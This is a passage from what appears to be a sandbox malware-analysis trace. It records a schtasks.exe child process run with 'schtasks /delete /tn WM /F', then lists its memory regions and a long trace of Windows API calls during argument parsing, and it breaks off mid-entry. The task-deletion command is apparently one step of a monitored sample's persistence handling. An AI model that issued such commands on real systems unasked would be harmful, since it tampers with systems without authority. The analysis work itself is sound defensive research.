"7" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x4c4ef000" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xa08" cmd_line = "schtasks /delete /tn WM /F " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1141 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1142 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1143 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1144 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1145 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1146 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1147 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1148 start_va = 0x2d0000 end_va = 0x301fff monitored = 1 entry_point = 0x2f05b0 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 1149 start_va = 0x310000 end_va = 0x430ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1150 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1151 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1152 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1153 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1154 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1155 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1156 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1157 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1158 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1159 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1160 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1161 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1162 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1163 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1164 start_va = 0x4600000 end_va = 0x486ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1165 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1166 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1167 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1168 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1169 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1170 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1171 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1172 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1173 start_va = 0x250000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1174 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1175 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1176 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1177 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1178 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1179 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1180 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1181 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1182 start_va = 0x4310000 end_va = 0x43f9fff monitored = 0 entry_point = 0x434d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1183 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1184 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1185 start_va = 0x4870000 end_va = 0x4c6afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004870000" filename = "" Region: id = 1186 start_va = 0x4c70000 end_va = 0x4fa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1187 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1188 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1189 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1190 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1191 start_va = 0x6cc60000 end_va = 0x6ccebfff monitored = 0 entry_point = 0x6cc9a6c0 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 1192 start_va = 0x4310000 end_va = 0x43effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 119 os_tid = 0xcc4 [0142.838] GetModuleHandleA (lpModuleName=0x0) returned 0x2d0000 [0142.838] __set_app_type (_Type=0x1) [0142.838] __p__fmode () returned 0x74974d6c [0142.838] __p__commode () returned 0x74975b1c [0142.839] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2f0840) returned 0x0 [0142.839] __wgetmainargs (in: _Argc=0x2fade0, _Argv=0x2fade4, _Env=0x2fade8, _DoWildCard=0, _StartInfo=0x2fadf4 | out: _Argc=0x2fade0, _Argv=0x2fade4, _Env=0x2fade8) returned 0 [0142.839] _onexit (_Func=0x2f2bc0) returned 0x2f2bc0 [0142.840] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.840] WinSqmIsOptedIn () returned 0x0 [0142.840] GetProcessHeap () returned 0x4770000 [0142.840] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777370 [0142.841] RtlRestoreLastWin32Error () returned 0x0 [0142.841] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0142.841] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0142.841] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0142.841] RtlVerifyVersionInfo (VersionInfo=0xdf9f8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0142.841] GetProcessHeap () returned 0x4770000 [0142.841] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777388 [0142.841] lstrlenW (lpString="") returned 0 [0142.841] GetProcessHeap () returned 0x4770000 [0142.841] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x2) returned 0x4770598 [0142.841] GetProcessHeap () returned 0x4770000 [0142.841] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776dc8 [0142.841] GetProcessHeap () returned 0x4770000 [0142.841] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47772c8 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776b90 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776bb0 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776bd0 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47767c0 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47773b8 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47767e0 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776800 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776558 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776578 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47772e0 [0142.842] GetProcessHeap () returned 0x4770000 [0142.842] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776598 [0142.843] GetProcessHeap () returned 0x4770000 [0142.843] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4772768 [0142.843] GetProcessHeap () returned 0x4770000 [0142.843] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4772788 [0142.843] GetProcessHeap () returned 0x4770000 [0142.843] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47727a8 [0142.843] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.858] RtlRestoreLastWin32Error () returned 0x0 [0142.858] GetProcessHeap () returned 0x4770000 [0142.858] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47795e8 [0142.858] GetProcessHeap () returned 0x4770000 [0142.858] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779308 [0142.858] GetProcessHeap () returned 0x4770000 [0142.858] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47795a8 [0142.858] GetProcessHeap () returned 0x4770000 [0142.858] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47795c8 [0142.858] GetProcessHeap () returned 0x4770000 [0142.858] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779668 [0142.858] GetProcessHeap () returned 0x4770000 [0142.858] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777448 [0142.858] _memicmp (_Buf1=0x4777448, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.858] GetProcessHeap () returned 0x4770000 [0142.858] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x208) returned 0x4778c60 [0142.859] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4778c60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0142.859] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdfb04 | out: lpdwHandle=0xdfb04) returned 0x76c [0142.861] GetProcessHeap () returned 0x4770000 [0142.861] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x776) returned 0x4779d38 [0142.862] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4779d38 | out: lpData=0x4779d38) returned 1 [0142.862] VerQueryValueW (in: pBlock=0x4779d38, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdfb0c, puLen=0xdfb10 | out: lplpBuffer=0xdfb0c*=0x477a0e8, puLen=0xdfb10) returned 1 [0142.869] _memicmp (_Buf1=0x4777448, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.869] _vsnwprintf (in: _Buffer=0x4778c60, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdfaf0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0142.869] VerQueryValueW (in: pBlock=0x4779d38, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdfb1c, puLen=0xdfb18 | out: lplpBuffer=0xdfb1c*=0x4779f18, puLen=0xdfb18) returned 1 [0142.869] lstrlenW (lpString="schtasks.exe") returned 12 [0142.869] lstrlenW (lpString="schtasks.exe") returned 12 [0142.869] lstrlenW (lpString=".EXE") returned 4 [0142.869] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0142.870] lstrlenW (lpString="schtasks.exe") returned 12 [0142.870] lstrlenW (lpString=".EXE") returned 4 [0142.870] _memicmp (_Buf1=0x4777448, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.870] lstrlenW (lpString="schtasks") returned 8 [0142.870] GetProcessHeap () returned 0x4770000 [0142.870] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47793c8 [0142.870] GetProcessHeap () returned 0x4770000 [0142.870] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47793e8 [0142.870] GetProcessHeap () returned 0x4770000 [0142.870] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779608 [0142.870] GetProcessHeap () returned 0x4770000 [0142.870] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47792e8 [0142.870] GetProcessHeap () returned 0x4770000 [0142.870] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777400 [0142.871] _memicmp (_Buf1=0x4777400, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.871] GetProcessHeap () returned 0x4770000 [0142.871] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xa0) returned 0x4776960 [0142.871] GetProcessHeap () returned 0x4770000 [0142.871] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779508 [0142.871] GetProcessHeap () returned 0x4770000 [0142.871] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779408 [0142.871] GetProcessHeap () returned 0x4770000 [0142.871] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779328 [0142.871] GetProcessHeap () returned 0x4770000 [0142.871] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777328 [0142.871] _memicmp (_Buf1=0x4777328, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.871] GetProcessHeap () returned 0x4770000 [0142.871] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x200) returned 0x477a718 [0142.871] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x477a718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0142.871] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0142.871] GetProcessHeap () returned 0x4770000 [0142.872] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x30) returned 0x4776a08 [0142.872] _vsnwprintf (in: _Buffer=0x4776960, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdfaf4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0142.872] GetProcessHeap () returned 0x4770000 [0142.872] GetProcessHeap () returned 0x4770000 [0142.872] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779d38) returned 1 [0142.872] GetProcessHeap () returned 0x4770000 [0142.872] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779d38) returned 0x776 [0142.872] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779d38) returned 1 [0142.872] RtlRestoreLastWin32Error () returned 0x0 [0142.872] GetThreadLocale () returned 0x409 [0142.872] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.872] lstrlenW (lpString="?") returned 1 [0142.873] GetThreadLocale () returned 0x409 [0142.873] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.873] lstrlenW (lpString="create") returned 6 [0142.873] GetThreadLocale () returned 0x409 [0142.873] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.873] lstrlenW (lpString="delete") returned 6 [0142.873] GetThreadLocale () returned 0x409 [0142.873] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.873] lstrlenW (lpString="query") returned 5 [0142.873] GetThreadLocale () returned 0x409 [0142.873] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.873] lstrlenW (lpString="change") returned 6 [0142.873] GetThreadLocale () returned 0x409 [0142.873] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.873] lstrlenW (lpString="run") returned 3 [0142.873] GetThreadLocale () returned 0x409 [0142.873] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.873] lstrlenW (lpString="end") returned 3 [0142.873] GetThreadLocale () returned 0x409 [0142.873] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.873] lstrlenW (lpString="showsid") returned 7 [0142.873] GetThreadLocale () returned 0x409 [0142.873] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.873] RtlRestoreLastWin32Error () returned 0x0 [0142.873] RtlRestoreLastWin32Error () returned 0x0 [0142.874] lstrlenW (lpString="/delete") returned 7 [0142.874] lstrlenW (lpString="-/") returned 2 [0142.874] StrChrIW (lpStart="-/", wMatch=0x2c002f) returned="/" [0142.874] lstrlenW (lpString="?") returned 1 [0142.874] lstrlenW (lpString="?") returned 1 [0142.874] GetProcessHeap () returned 0x4770000 [0142.874] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777418 [0142.874] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.874] GetProcessHeap () returned 0x4770000 [0142.874] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xa) returned 0x4777430 [0142.874] lstrlenW (lpString="delete") returned 6 [0142.874] GetProcessHeap () returned 0x4770000 [0142.874] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47773e8 [0142.874] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.874] GetProcessHeap () returned 0x4770000 [0142.874] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779428 [0142.875] _vsnwprintf (in: _Buffer=0x4777430, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0142.876] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0142.876] lstrlenW (lpString="|?|") returned 3 [0142.876] lstrlenW (lpString="|delete|") returned 8 [0142.876] RtlRestoreLastWin32Error () returned 0x490 [0142.876] lstrlenW (lpString="create") returned 6 [0142.876] lstrlenW (lpString="create") returned 6 [0142.876] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.876] GetProcessHeap () returned 0x4770000 [0142.876] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777430) returned 1 [0142.877] GetProcessHeap () returned 0x4770000 [0142.877] RtlReAllocateHeap (Heap=0x4770000, Flags=0xc, Ptr=0x4777430, Size=0x14) returned 0x4779448 [0142.877] lstrlenW (lpString="delete") returned 6 [0142.877] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.877] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0142.877] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0142.877] lstrlenW (lpString="|create|") returned 8 [0142.877] lstrlenW (lpString="|delete|") returned 8 [0142.877] StrStrIW (lpFirst="|create|", lpSrch="|delete|") returned 0x0 [0142.877] RtlRestoreLastWin32Error () returned 0x490 [0142.877] lstrlenW (lpString="delete") returned 6 [0142.877] lstrlenW (lpString="delete") returned 6 [0142.877] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.877] lstrlenW (lpString="delete") returned 6 [0142.877] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.877] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0142.877] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0142.877] lstrlenW (lpString="|delete|") returned 8 [0142.877] lstrlenW (lpString="|delete|") returned 8 [0142.877] StrStrIW (lpFirst="|delete|", lpSrch="|delete|") returned="|delete|" [0142.878] RtlRestoreLastWin32Error () returned 0x0 [0142.878] RtlRestoreLastWin32Error () returned 0x0 [0142.878] RtlRestoreLastWin32Error () returned 0x0 [0142.878] lstrlenW (lpString="/tn") returned 3 [0142.878] lstrlenW (lpString="-/") returned 2 [0142.878] StrChrIW (lpStart="-/", wMatch=0x2c002f) returned="/" [0142.879] lstrlenW (lpString="?") returned 1 [0142.879] lstrlenW (lpString="?") returned 1 [0142.879] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.879] lstrlenW (lpString="tn") returned 2 [0142.879] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.879] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0142.879] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0142.880] lstrlenW (lpString="|?|") returned 3 [0142.880] lstrlenW (lpString="|tn|") returned 4 [0142.880] RtlRestoreLastWin32Error () returned 0x490 [0142.880] lstrlenW (lpString="create") returned 6 [0142.880] lstrlenW (lpString="create") returned 6 [0142.880] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.880] lstrlenW 